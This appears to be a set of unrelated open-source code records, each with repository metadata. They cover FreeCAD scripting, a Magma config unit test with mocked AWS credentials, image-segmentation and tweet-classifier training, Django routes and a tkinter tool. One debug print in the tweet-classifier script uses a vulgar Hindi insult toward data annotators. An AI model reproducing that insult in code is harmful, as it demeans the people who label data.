Sphere{i}')\n lst.append(f'sphere.ViewObject.ShapeColor = {saipem}')\n lst.append(f'sphere.ViewObject.Transparency = {transparency}')\n\n # print(lst)\n\n return lst\n\n\ndef jointLabels(reg, nodelst=None, delta_text=[0.5, 0, 1], sections=False):\n # nodelst=[]\n saipem = (0, 85, 127)\n white = (255, 255, 255)\n black = (0, 0, 0)\n colour = saipem\n transparency = 50\n lst = ['doc=FreeCAD.ActiveDocument']\n\n default_block = f'''\nlabel.ViewObject.FontSize = 350 # Set the default font size (adjust as needed)\nlabel.ViewObject.ArrowSize = 100 # Set the default arrow size (adjust as needed)\nlabel.ViewObject.ArrowType = \"Dot\" # Set the default arrow type (adjust as needed)\nlabel.ViewObject.TextColor = {black} # Set the default text color (black)\nlabel.ViewObject.LineColor = {black} # Set the default line color (black)\nlabel.ViewObject.FontName = \"Arial\" # Set the default font name (adjust as needed)\nlabel.ViewObject.Frame = 'Rectangle' '''\n\n # cases = {'1001': ['0001', '0002', '0007', '0004', '0005']}\n\n cases = {'1000': ['0089', '0053', '0170', '0164', '0075'],\n '2002': ['0064', '0067', '0077', '0070', '0048'],\n '3100': ['0048', '0056', '0055', '0169', '0057'],\n '3200': ['0048', '0059', '0056', '0055', '0169'],\n '3300': ['0048', '0056', '0055', '0057', '0058'],\n '3600': ['0048', '0056', '0055', '0058', '0057'],\n '4000': ['0089', '0170', '0053', '0164', '0075']}\n\n rotation = [f'rotation = FreeCAD.Rotation(FreeCAD.Vector(1.00, 0.00, 0.00), 90.00)']\n\n for case in cases:\n lst.append(f'\\nfolder = doc.addObject(\"App::DocumentObjectGroup\",\"CASE {case}\")')\n for node in cases[case]:\n node = members.get_obj(node, 'Point')\n text_position = tuple([(c1 + c2) * 1000 for c1, c2 in zip(node.pos, delta_text)])\n lst.append([f'position = FreeCAD.Vector{node * 1000}'])\n lst.append([f'txt_position = FreeCAD.Vector({text_position})'])\n lst.append(rotation)\n lst.append([f'txt_placement = FreeCAD.Placement(txt_position, rotation)'])\n lst.append([f'label = Draft.make_label(position, txt_placement, custom_text=\"{node.name}\", distance=-100)'])\n lst.append(default_block)\n lst.append(f'folder.addObject(label)')\n # lst.append(f'folder.addObject(label)')\n if sections:\n print('Sections')\n lst += jointGen(reg, cases[case], inputfile='xls', sections=True, stub_len=1, folder=False)\n\n # print(lst)\n return lst\n\n\ndef extendPoint(pointA, pointB, dist=0, mode=1):\n # modetypes=['fromA','fromB','middle']\n vec = members.Vector(pointA, pointB)\n if mode == 1:\n point = 'A'\n elif mode == 2:\n point = 'B'\n elif mode == 'middle': # TODO finish if necessary\n point = 'middle'\n\n return vec.node_along(point=point, dist=dist)\n\n\nimport openpyxl\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\ndef rgb_to_hex(rgb):\n return '%02x%02x%02x' % rgb\n\ndef export_list_to_excel(data_list, output_filename):\n # Create a DataFrame from the list\n df = pd.DataFrame(data_list,\n columns=['Group', 'Group Element', 'Material', 'Diameter', 'Thickness', 'Colour Code'])\n\n # Convert the RGB code to a string representation\n df['Colour Code'] = df['Colour Code'].apply(rgb_to_hex)\n\n # Create an Excel workbook and select the active sheet\n workbook = openpyxl.Workbook()\n sheet = workbook.active\n\n # Write the DataFrame to the sheet\n for row in dataframe_to_rows(df, index=False, header=True):\n sheet.append(row)\n\n # Apply fill color to the last cell of each row\n for row in sheet.iter_rows(min_row=2, max_row=sheet.max_row, min_col=sheet.max_column, max_col=sheet.max_column):\n cell = row[0]\n rgb_code = cell.value\n fill = openpyxl.styles.PatternFill(start_color=rgb_code, end_color=rgb_code, fill_type=\"solid\")\n cell.fill = fill\n\n # Save the workbook\n workbook.save(output_filename)\n","repo_name":"quintbythesea/FreecadNodesSACS","sub_path":"freecad.py","file_name":"freecad.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7739914214","text":"from words import Word\nfrom location import Location\nl1 = Location(3, 5)\nw1 = Word(\"zebra\", \"HR\", l1)\nl2 = Location(-10, 10)\nw2 = Word(\"Panther\", \"DLD\", l2)\nl3 = Location()\nw3 = Word(\"GIRAFFE\", \"DRU\", l3)\nprint(w1)\nprint(w2)\nprint(w3)","repo_name":"smallrussian/CSC","sub_path":"python/wordstest.py","file_name":"wordstest.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"40693422993","text":"import os\nimport shutil\nimport subprocess\nfrom tempfile import mkdtemp\nfrom unittest import TestCase, main\nfrom unittest.mock import patch\n\nimport configlib\nimport utils.awslib\nimport yaml\nfrom utils.common import get_json\n\n\nclass TestConfigManager(TestCase):\n def setUp(self):\n self.root_dir = mkdtemp()\n self.constants = {\n 'project_dir': self.root_dir,\n 'config_dir': '%s/configs' % self.root_dir,\n 'vars_definition': '%s/vars.yml' % self.root_dir,\n 'components': ['infra', 'platform', 'service'],\n 'auto_tf': self.root_dir + '/terraform.tfvars.json',\n 'tf_dir': self.root_dir,\n 'main_tf': self.root_dir + '/main.tf',\n 'vars_tf': self.root_dir + '/vars.tf',\n }\n # add config directory\n os.makedirs(self.constants[\"config_dir\"])\n test_vars = {\n \"infra\": {\n \"aws_access_key_id\": {\n \"Required\": True,\n \"ConfigApps\": [\"awscli\"],\n },\n \"aws_secret_access_key\": {\n \"Required\": True,\n \"ConfigApps\": [\"awscli\"],\n },\n \"cluster_name\": {\n \"Required\": False,\n \"ConfigApps\": [\"tf\"],\n },\n \"secretsmanager_orc8r_secret\": {\n \"Required\": True,\n \"ConfigApps\": [\"tf\"],\n },\n },\n \"platform\": {\n \"deploy_elastic\": {\n \"Required\": False,\n \"ConfigApps\": [\"tf\"],\n },\n \"nms_db_password\": {\n \"Required\": True,\n \"ConfigApps\": [\"tf\"],\n },\n },\n \"service\": {\n \"lte_orc8r_chart_version\": {\n \"Required\": False,\n \"Default\": \"0.2.4\",\n \"ConfigApps\": [\"tf\"],\n },\n },\n }\n with open(self.constants['vars_definition'], 'w') as f:\n yaml.dump(test_vars, f)\n\n # write a simple jinja template file\n jinja_template = (\n '''\n{% for k in cfg['infra'] %}\n{{k}}=var.{{k}}{% endfor %}\n'''\n )\n with open(self.constants['tf_dir'] + '/main.tf.j2', 'w') as f:\n f.write(jinja_template)\n\n jinja_template = (\n '''\n{% for k in cfg %}\nvariable \"{{k}}\" {}{% endfor %}\n'''\n )\n with open(self.constants['tf_dir'] + '/vars.tf.j2', 'w') as f:\n f.write(jinja_template)\n\n def tearDown(self):\n shutil.rmtree(self.root_dir, ignore_errors=True)\n\n @patch(\"configlib.get_input\")\n @patch(\"utils.awslib.run_command\")\n def test_configure_sanity(self, mock_run_command, mock_get_input):\n mock_vals = {\n 'aws_access_key_id': 'foo',\n 'aws_secret_access_key': 'bar',\n 'secretsmanager_orc8r_secret': 'jar',\n }\n mock_get_input.side_effect = [\n mock_vals['aws_access_key_id'],\n mock_vals['aws_secret_access_key'],\n mock_vals['secretsmanager_orc8r_secret'],\n ]\n mock_run_command.return_value = subprocess.CompletedProcess(\n args=[], returncode=0,\n )\n\n # verify if components tfvars json is created\n mgr = configlib.ConfigManager(self.constants)\n mgr.configure('infra')\n mgr.commit('infra')\n\n # verify if configs are set in infra tfvars json\n fn = \"%s/infra.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 3)\n self.assertEqual(cfg['aws_access_key_id'], \"foo\")\n self.assertEqual(cfg['aws_secret_access_key'], \"bar\")\n self.assertEqual(cfg['secretsmanager_orc8r_secret'], \"jar\")\n\n # check if aws configs are set\n aws_config_cmd = ['aws', 'configure', 'set']\n mock_run_command.assert_any_call(\n aws_config_cmd + ['aws_access_key_id', 'foo'],\n )\n mock_run_command.assert_any_call(\n aws_config_cmd + ['aws_secret_access_key', 'bar'],\n )\n\n # verify that platform tfvars json file isn't present\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n self.assertEqual(os.path.isfile(fn), False)\n\n # reset mocks\n mock_get_input.reset_mock()\n mock_run_command.reset_mock()\n\n mock_vals = {\n 'nms_db_password': 'foo',\n }\n mock_get_input.side_effect = [\n mock_vals['nms_db_password'],\n ]\n\n # configure platform\n mgr.configure('platform')\n mgr.commit('platform')\n\n # verify that no aws call was invoked\n self.assertEqual(mock_run_command.call_count, 0)\n\n # check if we only invoked input for nms_db_password\n self.assertEqual(mock_get_input.call_count, 1)\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n\n # verify that service tfvars json file isn't present\n fn = \"%s/service.tfvars.json\" % self.constants['config_dir']\n self.assertEqual(os.path.isfile(fn), False)\n\n # reset mocks\n mock_get_input.reset_mock()\n mock_run_command.reset_mock()\n\n # configure service\n mgr.configure('service')\n mgr.commit('service')\n\n # verify that no input or aws call was invoked\n self.assertEqual(mock_run_command.call_count, 0)\n self.assertEqual(mock_get_input.call_count, 0)\n\n fn = \"%s/service.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n\n # verify that default value was set\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['lte_orc8r_chart_version'], \"0.2.4\")\n\n # finally verify if all configs required by tf is present\n cfg = get_json(self.constants['auto_tf'])\n self.assertEqual(len(cfg.keys()), 3)\n self.assertEqual(cfg['secretsmanager_orc8r_secret'], \"jar\")\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n self.assertEqual(cfg['lte_orc8r_chart_version'], \"0.2.4\")\n\n # verify if jinja template has been rendered accordingly\n with open(self.constants['main_tf']) as f:\n jinja_cfg = dict(\n ln.split('=')\n for ln in f.readlines() if ln.strip()\n )\n\n # all infra terraform keys should be present in the jinja template\n self.assertEqual(\n set(jinja_cfg.keys()),\n set(['secretsmanager_orc8r_secret']),\n )\n\n # variable tf is of the form variable \"var_name\" {}\n # get the middle element and remove the quotes\n with open(self.constants['vars_tf']) as f:\n jinja_cfg = [\n ln.split()[1][1:-1]\n for ln in f.readlines() if ln.strip()\n ]\n\n # all infra terraform keys should be present in the jinja template\n self.assertEqual(set(jinja_cfg), set(mgr.tf_vars))\n\n @patch(\"configlib.get_input\")\n @patch(\"utils.awslib.run_command\")\n def test_configure_set(self, mock_run_command, mock_get_input):\n mock_vals = {\n 'nms_db_password': 'foo',\n }\n mock_get_input.side_effect = [\n mock_vals['nms_db_password'],\n ]\n mock_run_command.return_value = 0\n\n # configure platform\n mgr = configlib.ConfigManager(self.constants)\n mgr.configure('platform')\n mgr.commit('platform')\n\n # check if we only invoked input for nms_db_password\n self.assertEqual(mock_get_input.call_count, 1)\n fn = \"%s/platform.tfvars.json\" % self.constants['config_dir']\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 1)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n\n # set a specific variable\n mgr.set('platform', 'deploy_elastic', 'true')\n mgr.commit('platform')\n\n cfg = get_json(fn)\n self.assertEqual(len(cfg.keys()), 2)\n self.assertEqual(cfg['deploy_elastic'], \"true\")\n\n # finally verify if all configs required by tf is present\n cfg = get_json(self.constants['auto_tf'])\n self.assertEqual(len(cfg.keys()), 2)\n self.assertEqual(cfg['nms_db_password'], \"foo\")\n self.assertEqual(cfg['deploy_elastic'], \"true\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"magma/magma","sub_path":"orc8r/cloud/deploy/orc8r_deployer/docker/root/scripts/cli/configlib_test.py","file_name":"configlib_test.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"6"} +{"seq_id":"17673150807","text":"from collections import defaultdict\nfrom typing import List\nfrom tqdm import tqdm\nfrom chainer.finders.finder import Finder\nfrom chainer.finders.masked_indexer import MaskedIndexer\n\nvocab = [\n \"a\",\n \"b\",\n \"c\",\n \"ç\",\n \"d\",\n \"e\",\n \"f\",\n \"g\",\n \"h\",\n \"i\",\n \"j\",\n \"k\",\n \"l\",\n \"l·l\",\n \"m\",\n \"n\",\n \"o\",\n \"p\",\n \"q\",\n \"r\",\n \"s\",\n \"t\",\n \"u\",\n \"v\",\n \"w\",\n \"x\",\n \"y\",\n \"z\",\n]\n\n\nclass IntegratsFinder(Finder):\n def __init__(self, words: set):\n super().__init__(\".motcache/integrats.json\")\n self.words = words\n self.index = defaultdict(list)\n self.indexer = MaskedIndexer(words)\n\n def build_index(self, force: bool = False):\n self.indexer.build_index(force)\n self.index = self.indexer.index\n\n def add_mask(self, word: str):\n for index in range(len(word) + 1):\n yield word[:index] + \"*\" + word[index:]\n\n def find_words(self, word: str) -> List[str]:\n ret = set()\n for masked_word in self.add_mask(word):\n if masked_word in self.index:\n ret = ret.union(self.index[masked_word])\n if len(ret) == 0:\n return []\n return list(key for key in ret if key != word)\n","repo_name":"ccoreilly/jocsdemots","sub_path":"chainer/finders/integrats.py","file_name":"integrats.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21955329598","text":"import numpy as np\nfrom skimage.io import imread, imshow\nfrom skimage.transform import resize\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom model import Nest_Net\nfrom losses import dice_coef_loss_bce, dice_coef, hard_dice_coef, binary_crossentropy\nfrom my_tools import rle_encoding, rle_decode\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.optimizers import Adam\nfrom keras.models import load_model\nfrom keras.utils import Sequence\nfrom main import create_train_image_generator\n\n# https://drive.google.com/file/d/0B0d9ZiqAgFkiOHR1NTJhWVJMNEU/view\n# path = 'PicsArt/data/'\n# path = 'data/dataset1'\npath = '/media/danil/Data/Datasets/PicsArt/dataset1'\nBATCH = 12\ntarget_shape = (320, 240)\nsupervision = False\n\ndef load_train_data(path):\n print('===LOAD DATA===')\n train_images = os.listdir(os.path.join(path, 'images_prepped_train'))\n train_images_list = [resize(imread(os.path.join(path, 'images_prepped_train', img)), target_shape) for img in train_images]\n train_mask_list = [resize(imread(os.path.join(path, 'annotations_prepped_train', img)), target_shape) for img in train_images]\n return np.array(train_images_list), np.expand_dims(np.array(train_mask_list),-1)\n\ndef load_test_data(path):\n print('===LOAD TEST DATA===')\n image_names = os.listdir(os.path.join(path, 'images_prepped_test'))\n test_images_list = [resize(imread(os.path.join(path, 'images_prepped_test', img)),target_shape) for img in image_names]\n test_mask_list = [resize(imread(os.path.join(path, 'annotations_prepped_test', img)), target_shape) for img in image_names]\n return np.array(test_images_list), np.expand_dims(np.array(test_mask_list),-1)\n\ndef make_predict(model):\n image_names, test_images_array = load_test_data(path)\n test_images_array = test_images_array / 255.\n print('===PREDICT===')\n predict_mask = model.predict(test_images_array, batch_size=1, verbose=1)\n return test_images_array, predict_mask, image_names\n\ndef create_callbaks(model_name='unet++.h5'):\n checkpoint = ModelCheckpoint('weights/' + model_name, monitor='val_loss', mode='min', save_best_only=True, verbose=1)\n return [checkpoint]\n\nif __name__ == '__main__':\n train_images, train_mask = load_train_data(path)\n train_mask = (train_mask == 8./255).astype(float)\n\n test_images, test_mask = load_test_data(path)\n test_mask = (test_mask == 8./255).astype(float)\n\n train_generator = create_train_image_generator((train_images*255).astype(np.uint8), (train_mask*255).astype(np.uint8), batch=BATCH, supervision = supervision)\n\n model = Nest_Net(320, 240, 3, deep_supervision=supervision)\n #model = load_model('weights/unet_with_car_data.h5', compile=False)\n\n if supervision:\n loss = {'output_1': binary_crossentropy,\n 'output_2': binary_crossentropy,\n 'output_3': binary_crossentropy,\n 'output_4': dice_coef_loss_bce}\n\n val_data = (test_images, {'output_1': test_mask,\n 'output_2': test_mask,\n 'output_3': test_mask,\n 'output_4': test_mask})\n metric = {'output_4': [dice_coef, hard_dice_coef, binary_crossentropy]}\n loss_weight = [0.25, 0.25, 0.5, 1.]\n else:\n loss = dice_coef_loss_bce\n val_data = (test_images, test_mask)\n metric = [dice_coef, hard_dice_coef, binary_crossentropy]\n loss_weight = [1.]\n\n model.compile(optimizer=Adam(1e-3), loss=loss, metrics=metric, loss_weights=loss_weight)\n callbacks = create_callbaks(model_name='unet_with_car_data.h5')\n\n print('===FIT MODEL===')\n model.fit_generator(train_generator,\n steps_per_epoch = train_images.shape[0]/BATCH,\n epochs=20,\n verbose=2,\n callbacks=callbacks,\n validation_data=val_data)\n \n model = load_model('weights/unet_with_car_data_supervision.h5', compile=False)\n model.compile(optimizer=Adam(1e-4), loss=loss, metrics=[dice_coef, hard_dice_coef, binary_crossentropy])\n model.fit_generator(train_generator,\n steps_per_epoch = train_images.shape[0]/BATCH,\n epochs=10,\n verbose=2,\n callbacks=callbacks,\n validation_data=val_data)\n\n x, y = next(train_generator)\n plt.figure()\n imshow(x[0])\n plt.show(block=False)\n plt.figure()\n imshow(y[0,...,0])\n plt.show(block=False)\n\n\n","repo_name":"Danil328/PicsArt","sub_path":"pretrain_model.py","file_name":"pretrain_model.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1132055786","text":"from . import views\nfrom django.urls import path,register_converter\nimport logging\napp_name='YuceInfo'\n\n# class FilePath:\n# regex=\".*\"\n# def to_python(self,value):\n# logging.info(str(value))\n# return str(value)\n# def to_url(self,value):\n# logging.info(str(value))\n# return '%s'%str(value)\n#\n# register_converter(FilePath,'fp')\nurlpatterns=[\n path('', views.index),\n path('imageview//',views.fileview.imageview,name='imageview'),\n path('tableview//',views.fileview.tableview,name='tableview'),\n #项目管理的任务操作\n path('PMTaskHandle/pause/',views.pmtaskhandle.cmd), # 暂停操作 cmd:实验暂停 分析暂停\n path('PMTaskHandle/reset/',views.pmtaskhandle.reset), # 重置任务\n path('PMTaskHandle/go/', views.pmtaskhandle.go), # 保留项\n path('PMTaskHandle/modify/', views.pmtaskhandle.modify), # 任务修改\n path('PMTaskHandle/view/', views.pmtaskhandle.view), # 任务列表\n path('PMTaskHandle/stop/', views.pmtaskhandle.stop), #终止任务\n path('PMTaskHandle/cancel/', views.pmtaskhandle.cancel), # 取消操作 cmd: 取消实验 取消解读\n path('PMTaskHandle/allocate/', views.pmtaskhandle.allocate), # 任务分配\n\n\n # 分析师任务操作\n path('AnaTaskHandle/view/',views.anataskhandle.view),\n path('AnaTaskHandle/modify/',views.anataskhandle.modify),\n path('AnaTaskHandle/qcview/', views.anataskhandle.qcview),\n # 解读师任务操作\n path('JieduTaskHandle/view/', views.jiedutaskhandle.view),# 任务列表\n path('JieduTaskHandle/detailview/', views.jiedutaskhandle.detailview),#任务详细\n path('JieduTaskHandle/download/', views.jiedutaskhandle.download),#下载报告\n path('JieduTaskHandle/upload/', views.jiedutaskhandle.upload),#上传报告\n path('JieduTaskHandle/review/', views.jiedutaskhandle.review),#审核\n # 项目操作\n path('ProjectHandle/init/',views.projecthandle.init), # 添加项目\n path('ProjectHandle/complement/', views.projecthandle.complement), #补充订单\n path('ProjectHandle/complementhelp/', views.projecthandle.complementhelp), #辅助补充订单\n path('ProjectHandle/cmd/', views.projecthandle.cmd), # 项目cmd\n path('ProjectHandle/view/', views.projecthandle.view), # 项目列表\n # 患者操作\n path('PatientHandle/init/', views.patienthandle.init), # 添加患者\n path('PatientHandle/view/', views.patienthandle.view), # 患者列表\n path('PatientHandle/modify/', views.patienthandle.modify), # 患者列表\n path('PatientHandle/addproject/', views.patienthandle.addproject), # 直接下单\n path('PatientHandle/add2project/', views.patienthandle.add2project), # 添加到项目\n path('PatientHandle/batchadd/',views.patienthandle.batchadd), # 批量导入患者\n # 样本管理\n path('SampleHandle/init/', views.samplehandle.init), # 添加样本\n path('SampleHandle/modify/', views.samplehandle.modify), # 完善或者修改样本信息\n path('SampleHandle/view/', views.samplehandle.view), # 样本列表\n path('SampleHandle/upload/', views.samplehandle.upload), # 批量导入样本\n # 实验室管理的任务操作\n path('LabTaskHandle/cmd/', views.labtaskhandle.cmd), # cmd操作,进行,暂停,终止,重置\n path('LabTaskHandle/order/', views.labtaskhandle.order), # 内部下单\n path('LabTaskHandle/view/', views.labtaskhandle.view), # 任务列表\n # 实验管理\n path('ExperimentHandle/view/', views.experimenthandle.view), # 实验列表\n path('ExperimentHandle/cmd/', views.experimenthandle.cmd), # 实验cmd\n\n # 提取管理\n path('ExtractHandle/download/', views.extracthandle.download), # 批量导入数据\n path('ExtractHandle/upload/', views.extracthandle.upload), # 批量导入数据\n path('ExtractHandle/view/', views.extracthandle.view), # 提取结果列表\n # 建库管理\n path('LibraryHandle/view/', views.libraryhandle.view), # 提取结果列表\n path('LibraryHandle/upload/', views.libraryhandle.upload), # 提取结果列表\n path('LibraryHandle/download/', views.libraryhandle.download), # 提取结果列表模板下载\n # 杂交\n path('HybridHandle/view/', views.hybridhandle.view), # 提取结果列表\n path('HybridHandle/upload/', views.hybridhandle.upload), # 提取结果列表\n path('HybridHandle/download/', views.hybridhandle.download), # 提取结果列表模板下载\n # 质控\n path('LabQCHandle/view/', views.labqc.view), # 提取结果列表\n path('LabQCHandle/upload/', views.labqc.upload), # 提取结果列表\n path('LabQCHandle/download/', views.labqc.download), # 提取结果列表模板下载\n # 测序\n path('SeqHandle/view/', views.seqhandle.view), # 提取结果列表\n path('SeqHandle/upload/', views.seqhandle.upload), # 提取结果列表\n path('SeqHandle/download/', views.seqhandle.download), # 提取结果列表模板下载\n\n # 产品操作\n path('ProductHandle/view/',views.producthandle.view), # 产品列表\n path('ProductHandle/add/', views.producthandle.add), # 添加或修改产品\n path('ProductHandle/batchadd/', views.producthandle.batchadd), # 添加或修改产品\n]","repo_name":"Ryanrenqian/yuceInfo","sub_path":"projectmanage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37188153999","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, GRU, Input\nfrom keras.models import Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nfrom nltk.corpus import words, stopwords\nfrom keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport csv\nimport keras\nimport re\nimport random\n\nimport time\nimport string\nfrom contextlib import contextmanager\nimport gc\ngc.collect()\n\n@contextmanager\ndef timer(name):\n\tt0 = time.time()\n\tyield\n\tprint(\"\\n\\n\" + name + ' done in ' + str(round(time.time() - t0)) + 's \\n')\n\n\nprint(\"\\n\\nStarting\\n\\n\")\ncachedStopWords = stopwords.words(\"english\")\nallEnglishWords = words.words()\nallEnglishWords[:] = [x.lower() for x in allEnglishWords]\n\nvocabSize = len(allEnglishWords)\ntokenizer = Tokenizer(num_words=vocabSize)\ntokenised = tokenizer.fit_on_texts(allEnglishWords)\n\n\nclass Judge():\n\tdef __init__(self):\n\t\tjudge = self.createJudgeNetwork()\n\n\tdef createJudgeNetwork(self):\n\t\twith timer(\"Making embedding index dict\"):\n\t\t\tembeddings_index = dict()\n\t\t\tf = open('glove.twitter.27B/glove.twitter.27B.100d.txt', encoding=\"utf8\")\n\t\t\tfor line in f:\n\t\t\t\tvalues = line.split()\n\t\t\t\tword = values[0]\n\t\t\t\tcoefs = np.asarray(values[1:], dtype='float32')\n\t\t\t\tembeddings_index[word] = coefs\n\t\t\tf.close()\n\t\t\tprint('Loaded %s word vectors.' % len(embeddings_index))\n\n\n\t\twith timer(\"Making Embedding matrix\"):\n\t\t\tembedding_matrix = np.zeros((vocabSize, 100))\n\t\t\tfor word, index in tokenizer.word_index.items():\n\t\t\t\tif index > vocabSize - 1:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tembedding_vector = embeddings_index.get(word)\n\t\t\t\t\tif embedding_vector is not None:\n\t\t\t\t\t\tembedding_matrix[index] = embedding_vector\n\t\t\t\t\t\t\n\t\twith timer(\"Making JUDGE Model\"):\n\t\t\tmain_input = Input(shape = (180,), dtype = 'int32', name = 'main_input')\n\t\t\tx = Embedding(vocabSize, 100, input_length=180, weights=[embedding_matrix])(main_input)\n\t\t\t# x = Embedding(output_dim=100, input_dim=vocabSize, input_length=180)(main_input)\n\t\t\tlstm_out = LSTM(180)(x)\n\n\t\t\tauxilary_input = Input(shape = (3,), name = 'aux_input')\n\t\t\tx = keras.layers.concatenate([lstm_out, auxilary_input])\n\n\t\t\tx = Dense(64, activation = 'relu')(x)\n\n\t\t\tmain_output = Dense(1, activation = 'sigmoid', name = 'main_output')(x)\n\n\t\t\tmodel = Model(inputs = [main_input, auxilary_input], outputs = [main_output])\n\t\t\tmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', loss_weights=[1], metrics = ['accuracy'])\n\n\t\treturn model\n\n\n\n\t\n\n\njudgeModel = Judge().judge\nprint(\"\\n\\nModel Made : \", judgeModel, \"\\n\\n\")\n\n\ndef clean(s):\n\ttransalator = str.maketrans(\"\", \"\", string.punctuation)\n\treturn s.translate(transalator)\n\ndef preprocess(text):\n\ttext = text.split(\",\")[-1]\n\ttext = clean(text).lower()\n\ttext = text.lower()\n\ttext = ' '.join([word for word in text.split()\n\t\t\t\t\t\tif word not in cachedStopWords])\n\ttext = ' '.join([word for word in text.split() if(not word.startswith(\n\t\t\"@\") and not word.startswith(\"http\") and not word.startswith(\"\\\\\"))])\n\ttext = ' '.join([word for word in text.split()\n\t\t\t\t\t\tif word in allEnglishWords])\n\t#text = re.sub(\"[_]\",\"\",text)\n\t#remove tags\n\ttext = re.sub(\"</?.*?>\", \" <> \", text)\n\t# remove special characters and digits\n\ttext = re.sub(\"(\\\\d|\\\\W)+\", \" \", text)\n\tif(text.startswith(\"rt \") or text.startswith(\" rt\")):\n\t\ttext = text[3:]\n\tif(text == \"rt\"):\n\t\ttext = \"\"\n\twhile(text != \"\" and text[0] == ' '):\n\t\ttext = text[1:]\n\treturn text\n\nwith timer(\"Reading data\"):\n x = []\n y = []\n radical = []\n radicalOne = 0\n with open(\"input.csv\", 'r', encoding=\"utf8\") as csvFile:\n reader = csv.reader(csvFile)\n p = 0\n for row in reader:\n if(p == 0):\n p = p + 1\n continue\n if(len(row) >= 2):\n s = row[0]\n x.append(preprocess(s))\n if(row[2] != '0.0'):\n radicalOne += 1\n if(row[2] != '1.0' and row[2] != '2.0'):\n print(\"Chutiya annotator tha : \", row[2], \" row : \", p)\n radicalOne -= 1\n s = 0\n if(row[2] == '1.0'):\n s = 1\n if(row[2] == '2.0'):\n s = 2\n radical.append(s)\n p = p + 1\n csvFile.close\n\nX = []\nfor t in x:\n t = re.sub(r'[^\\w\\s]', ' ', t)\n t = ' '.join([word for word in t.split() if word != \" \"])\n t = t.lower()\n t = ' '.join([word for word in t.split()\n if word not in cachedStopWords])\n X.append(t)\n\ntokenisedTest = tokenizer.texts_to_sequences(X)\nX_Test = sequence.pad_sequences(\n\ttokenisedTest, maxlen=180, padding='post')\n\n\naux_input = []\noutput = []\n\nfor i in range(0, len(X_Test)):\n\ta = random.randint(1, 100)\n\tb = random.randint(1, 100)\n\n\taux_input.append(a % 2)\n\toutput.append(b % 2)\n\t\n\naux_input = np.array(radical)\n\nprint(\"Auxilary Input = \", aux_input)\nprint(\"Output = \", output)\n\nwith timer('Fitting the model'):\n\tepochs = 1\n\tprint(\"epochs : \", epochs)\n\tfitHistory = judgeModel.fit(\n\t\t[X_Test, aux_input], [output], epochs=1, batch_size=200)\n\ttrainingAccuracy = fitHistory.history['acc']\n\twhile(trainingAccuracy[0] < 0.9):\n\t\tepochs += 1\n\t\tprint(\"epochs : \", epochs)\n\t\tfitHistory = judgeModel.fit([X_Test, aux_input], [output], epochs=1, batch_size=200)\n\t\ttrainingAccuracy = fitHistory.history['acc']\n\t\t\n\t\t\n\n\n\n\n","repo_name":"arinjayakhare1/Real-Time-Tweet-Classifier-using-RLAN","sub_path":"test/RLAN Test/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27158394894","text":"\"\"\"\nThis program updates point names of as build surveys from csv files.\nAuthor: Edip Ahmet Taskin\n24/2022\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport sv_ttk\nimport glob\nimport configparser\nimport pandas as pd\nimport geopandas as gpd\nfrom pathlib import Path\n\nconfig = configparser.ConfigParser()\nconfig.read('path.ini')\n\nclass App(ttk.Frame):\n def __init__( self, parent ):\n ttk.Frame.__init__(self)\n # Make the app responsive\n for index in [0, 1, 2]:\n self.columnconfigure(index=index, weight=1)\n self.rowconfigure(index=index, weight=1)\n # Create widgets\n self.setup_widgets()\n\n self.csv_path_input.set(config['path']['csv'])\n self.asbuilt_path_input.set(config['path']['asbuilt'])\n self.output_path_input.set(config['path']['output'])\n\n # Merge csv files: dir_path: csv folder\n def merge_csv( self, dir_path, column_names ):\n # find file name list: find all csv files in the folder\n files = glob.glob( dir_path+\"\\*.csv\", recursive=True )\n # fd_from_each_file is a generator. A generator is a special type of function which does not return a single value,\n # instead, it returns an iterator object with a sequence of values.\n df_from_each_file = (pd.read_csv(f, names=column_names) for f in files)\n # pd.concat merges all dataframe to one datafrome. the all dataframe type is generator.\n df = pd.concat(df_from_each_file, ignore_index=True)\n return df\n\n # Find as build files. Returns a list\n def find_asbuilts( self, dir_path ):\n\t # file_filter is the filter text to find .pts files\n file_filter = dir_path + '\\*.pts'\n # list: finds *.pts files\n files = glob.glob( 